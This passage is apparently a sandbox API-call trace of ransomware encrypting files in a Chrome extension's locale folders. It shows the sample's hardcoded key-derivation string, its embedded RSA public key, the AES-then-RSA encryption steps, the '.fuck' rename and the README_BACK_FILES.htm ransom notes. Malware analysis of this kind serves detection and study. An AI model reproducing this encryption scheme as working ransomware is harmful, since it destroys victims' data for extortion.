nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.048] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.048] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.048] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.048] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.049] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.049] GetLastError () returned 0x0 [0253.049] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json")) returned 0x20 [0253.049] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json", dwFileAttributes=0x80) returned 1 [0253.050] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.050] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.052] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.052] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.055] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.055] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.055] CryptHashData (hHash=0x29846a0, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.055] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.056] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.056] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.056] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298dc48) returned 1 [0253.056] CryptImportPublicKeyInfo (in: hCryptProv=0x298dc48, dwCertEncodingType=0x1, pInfo=0x29947f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2994820*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2994828*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29847e0) returned 1 [0253.056] CryptEncrypt (in: hKey=0x29847e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.056] CryptEncrypt (in: hKey=0x29847e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298d890*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298d890*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.057] WriteFile (in: hFile=0x5d60, lpBuffer=0x298d890*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298d890*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.058] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd5, lpOverlapped=0x0) returned 1 [0253.060] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0253.061] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.061] CloseHandle (hObject=0x5d5c) returned 1 [0253.061] CloseHandle (hObject=0x5d60) returned 1 [0253.061] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json"), bFailIfExists=0) returned 1 [0253.067] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json", dwFileAttributes=0x0) returned 1 [0253.067] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json.gsg")) returned 1 [0253.068] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json.fuck")) returned 1 [0253.070] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.070] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.070] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.070] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.070] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.070] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\readme_back_files.htm")) returned 0xffffffff [0253.070] AreFileApisANSI () returned 1 [0253.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0253.070] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.071] GetFileType (hFile=0x5d50) returned 0x1 [0253.071] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.072] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.072] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.073] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.073] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.073] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.073] GetLastError () returned 0x0 [0253.073] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json")) returned 0x20 [0253.074] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json", dwFileAttributes=0x80) returned 1 [0253.075] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.075] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.077] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.077] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.080] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.080] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.080] CryptHashData (hHash=0x29846a0, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.080] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984be0) returned 1 [0253.080] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.080] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.080] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298dab0) returned 1 [0253.081] CryptImportPublicKeyInfo (in: hCryptProv=0x298dab0, dwCertEncodingType=0x1, pInfo=0x2995350*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2995380*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2995388*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985160) returned 1 [0253.081] CryptEncrypt (in: hKey=0x2985160, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.081] CryptEncrypt (in: hKey=0x2985160, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298d780*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298d780*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.081] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298d780*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298d780*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.082] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd5, lpOverlapped=0x0) returned 1 [0253.083] CryptEncrypt (in: hKey=0x2984be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0253.084] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.084] CloseHandle (hObject=0x5d60) returned 1 [0253.084] CloseHandle (hObject=0x5d5c) returned 1 [0253.084] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json"), bFailIfExists=0) returned 1 [0253.088] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json", dwFileAttributes=0x0) returned 1 [0253.089] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json.gsg")) returned 1 [0253.090] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json.fuck")) returned 1 [0253.091] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.092] CryptDestroyKey (hKey=0x2984be0) returned 1 [0253.092] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.092] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.092] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.092] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\readme_back_files.htm")) returned 0xffffffff [0253.092] AreFileApisANSI () returned 1 [0253.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0253.092] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.093] GetFileType (hFile=0x5d50) returned 0x1 [0253.093] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.094] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.094] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.094] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.095] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.095] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.095] GetLastError () returned 0x0 [0253.095] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json")) returned 0x20 [0253.095] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json", dwFileAttributes=0x80) returned 1 [0253.096] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.096] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.097] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.097] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.100] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.100] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.100] CryptHashData (hHash=0x29846a0, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.100] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984be0) returned 1 [0253.100] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 